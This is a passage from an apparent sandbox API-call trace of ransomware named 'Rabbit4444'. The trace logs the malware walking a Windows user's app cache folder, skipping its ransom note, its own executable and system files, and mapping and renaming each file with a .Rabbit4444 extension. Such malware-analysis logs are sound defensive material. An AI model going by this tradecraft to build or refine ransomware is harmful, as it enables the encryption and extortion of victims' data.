"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9a290ab2-7828-46c3-a57f-0dee793f6b93}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9A290AB2-7828-46C3-A57F-0DEE793F6B93}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9a290ab2-7828-46c3-a57f-0dee793f6b93}.rabbit4444"), dwFlags=0x1) returned 1 [0068.141] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ae0de76, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9ae0de76, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c651c8, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", cAlternateFileName="{9B5B2~1")) returned 1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="Rabbit4444.exe") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2=".") returned 1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="..") returned 1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="windows") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="bootmgr") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="pagefile.sys") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="boot") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="ids.txt") returned -1 [0068.141] lstrcmpiW (lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", lpString2="NTUSER.DAT") returned -1 [0068.141] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}" | out: lpString1="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}") returned="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}" [0068.141] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9B5B2AF9-07C1-4A92-9B55-C36169549C19}", dwFileAttributes=0x0) returned 1 [0068.142] lstrlenW (lpString="{9B5B2AF9-07C1-4A92-9B55-C36169549C19}") returned 38 [0068.142] lstrlenW (lpString="Rabbit4444") returned 10 [0068.142] lstrcmpiW (lpString1="169549C19}", lpString2="Rabbit4444") returned -1 [0068.142] lstrlenW (lpString=".dll") returned 4 [0068.142] lstrcmpiW (lpString1="C19}", lpString2=".dll") returned 1 [0068.142] lstrlenW (lpString=".lnk") returned 4 [0068.142] lstrcmpiW (lpString1="C19}", lpString2=".lnk") returned 1 [0068.142] lstrlenW (lpString=".ini") returned 4 [0068.142] lstrcmpiW (lpString1="C19}", lpString2=".ini") returned 1 [0068.142] lstrlenW (lpString=".sys") returned 4 [0068.142] lstrcmpiW (lpString1="C19}", lpString2=".sys") returned 1 [0068.142] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9B5B2AF9-07C1-4A92-9B55-C36169549C19}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9b5b2af9-07c1-4a92-9b55-c36169549c19}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.142] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.142] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15945324208) returned 1 [0068.143] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0068.143] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.144] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.145] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15945598366) returned 1 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0068.145] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.146] CloseHandle (hObject=0x29c) returned 1 [0068.146] CloseHandle (hObject=0x280) returned 1 [0068.146] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9B5B2AF9-07C1-4A92-9B55-C36169549C19}.Rabbit4444") returned 156 [0068.146] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9B5B2AF9-07C1-4A92-9B55-C36169549C19}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9b5b2af9-07c1-4a92-9b55-c36169549c19}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9B5B2AF9-07C1-4A92-9B55-C36169549C19}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9b5b2af9-07c1-4a92-9b55-c36169549c19}.rabbit4444"), dwFlags=0x1) returned 1 [0068.146] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bcce7a6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bcce7a6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c651c8, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", cAlternateFileName="{9BF63~1")) returned 1 [0068.146] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.146] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="Rabbit4444.exe") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2=".") returned 1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="..") returned 1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="windows") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="bootmgr") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="pagefile.sys") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="boot") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="ids.txt") returned -1 [0068.147] lstrcmpiW (lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", lpString2="NTUSER.DAT") returned -1 [0068.147] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}" | out: lpString1="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}") returned="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}" [0068.147] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9BF63628-DDA6-43D6-ADB6-C919606A53F7}", dwFileAttributes=0x0) returned 1 [0068.147] lstrlenW (lpString="{9BF63628-DDA6-43D6-ADB6-C919606A53F7}") returned 38 [0068.147] lstrlenW (lpString="Rabbit4444") returned 10 [0068.147] lstrcmpiW (lpString1="9606A53F7}", lpString2="Rabbit4444") returned -1 [0068.147] lstrlenW (lpString=".dll") returned 4 [0068.147] lstrcmpiW (lpString1="3F7}", lpString2=".dll") returned 1 [0068.147] lstrlenW (lpString=".lnk") returned 4 [0068.147] lstrcmpiW (lpString1="3F7}", lpString2=".lnk") returned 1 [0068.147] lstrlenW (lpString=".ini") returned 4 [0068.147] lstrcmpiW (lpString1="3F7}", lpString2=".ini") returned 1 [0068.147] lstrlenW (lpString=".sys") returned 4 [0068.147] lstrcmpiW (lpString1="3F7}", lpString2=".sys") returned 1 [0068.147] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9BF63628-DDA6-43D6-ADB6-C919606A53F7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9bf63628-dda6-43d6-adb6-c919606a53f7}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.148] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.148] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15945847507) returned 1 [0068.148] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0068.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0068.148] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.152] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.153] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.153] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15946379063) returned 1 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0068.153] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0068.153] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.153] CloseHandle (hObject=0x29c) returned 1 [0068.153] CloseHandle (hObject=0x280) returned 1 [0068.153] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9BF63628-DDA6-43D6-ADB6-C919606A53F7}.Rabbit4444") returned 156 [0068.153] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9BF63628-DDA6-43D6-ADB6-C919606A53F7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9bf63628-dda6-43d6-adb6-c919606a53f7}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9BF63628-DDA6-43D6-ADB6-C919606A53F7}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9bf63628-dda6-43d6-adb6-c919606a53f7}.rabbit4444"), dwFlags=0x1) returned 1 [0068.154] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aea67dd, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9aea67dd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c63e56, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", cAlternateFileName="{A1640~1")) returned 1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="Rabbit4444.exe") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2=".") returned 1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="..") returned 1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="windows") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="bootmgr") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="pagefile.sys") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="boot") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="ids.txt") returned -1 [0068.154] lstrcmpiW (lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}", lpString2="NTUSER.DAT") returned -1 [0068.154] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A1640A19-DCA8-4534-B567-A06D68EED0AD}" | out: lpString1="{A1640A19-DCA8-4534-B567-A06D68EED0AD}") returned="{A1640A19-DCA8-4534-B567-A06D68EED0AD}" [0068.155] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A1640A19-DCA8-4534-B567-A06D68EED0AD}", dwFileAttributes=0x0) returned 1 [0068.155] lstrlenW (lpString="{A1640A19-DCA8-4534-B567-A06D68EED0AD}") returned 38 [0068.155] lstrlenW (lpString="Rabbit4444") returned 10 [0068.155] lstrcmpiW (lpString1="D68EED0AD}", lpString2="Rabbit4444") returned -1 [0068.155] lstrlenW (lpString=".dll") returned 4 [0068.155] lstrcmpiW (lpString1="0AD}", lpString2=".dll") returned 1 [0068.155] lstrlenW (lpString=".lnk") returned 4 [0068.155] lstrcmpiW (lpString1="0AD}", lpString2=".lnk") returned 1 [0068.155] lstrlenW (lpString=".ini") returned 4 [0068.155] lstrcmpiW (lpString1="0AD}", lpString2=".ini") returned 1 [0068.155] lstrlenW (lpString=".sys") returned 4 [0068.156] lstrcmpiW (lpString1="0AD}", lpString2=".sys") returned 1 [0068.156] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A1640A19-DCA8-4534-B567-A06D68EED0AD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a1640a19-dca8-4534-b567-a06d68eed0ad}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.156] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.156] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15946670372) returned 1 [0068.156] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0068.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0068.156] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.157] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.158] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.158] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15946923569) returned 1 [0068.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0068.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0068.159] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.159] CloseHandle (hObject=0x29c) returned 1 [0068.159] CloseHandle (hObject=0x280) returned 1 [0068.159] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A1640A19-DCA8-4534-B567-A06D68EED0AD}.Rabbit4444") returned 156 [0068.159] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A1640A19-DCA8-4534-B567-A06D68EED0AD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a1640a19-dca8-4534-b567-a06d68eed0ad}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A1640A19-DCA8-4534-B567-A06D68EED0AD}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a1640a19-dca8-4534-b567-a06d68eed0ad}.rabbit4444"), dwFlags=0x1) returned 1 [0068.160] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9af3f156, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9af3f156, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c651c8, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A2138824-5150-42FB-95C2-6147FA08716C}", cAlternateFileName="{A2138~1")) returned 1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="Rabbit4444.exe") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2=".") returned 1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="..") returned 1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="windows") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="bootmgr") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="pagefile.sys") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="boot") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="ids.txt") returned -1 [0068.160] lstrcmpiW (lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}", lpString2="NTUSER.DAT") returned -1 [0068.160] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A2138824-5150-42FB-95C2-6147FA08716C}" | out: lpString1="{A2138824-5150-42FB-95C2-6147FA08716C}") returned="{A2138824-5150-42FB-95C2-6147FA08716C}" [0068.160] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2138824-5150-42FB-95C2-6147FA08716C}", dwFileAttributes=0x0) returned 1 [0068.160] lstrlenW (lpString="{A2138824-5150-42FB-95C2-6147FA08716C}") returned 38 [0068.160] lstrlenW (lpString="Rabbit4444") returned 10 [0068.160] lstrcmpiW (lpString1="7FA08716C}", lpString2="Rabbit4444") returned -1 [0068.160] lstrlenW (lpString=".dll") returned 4 [0068.160] lstrcmpiW (lpString1="16C}", lpString2=".dll") returned 1 [0068.160] lstrlenW (lpString=".lnk") returned 4 [0068.160] lstrcmpiW (lpString1="16C}", lpString2=".lnk") returned 1 [0068.160] lstrlenW (lpString=".ini") returned 4 [0068.160] lstrcmpiW (lpString1="16C}", lpString2=".ini") returned 1 [0068.160] lstrlenW (lpString=".sys") returned 4 [0068.161] lstrcmpiW (lpString1="16C}", lpString2=".sys") returned 1 [0068.161] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2138824-5150-42FB-95C2-6147FA08716C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2138824-5150-42fb-95c2-6147fa08716c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.161] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.161] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15947168940) returned 1 [0068.161] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0068.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.161] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.162] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.163] 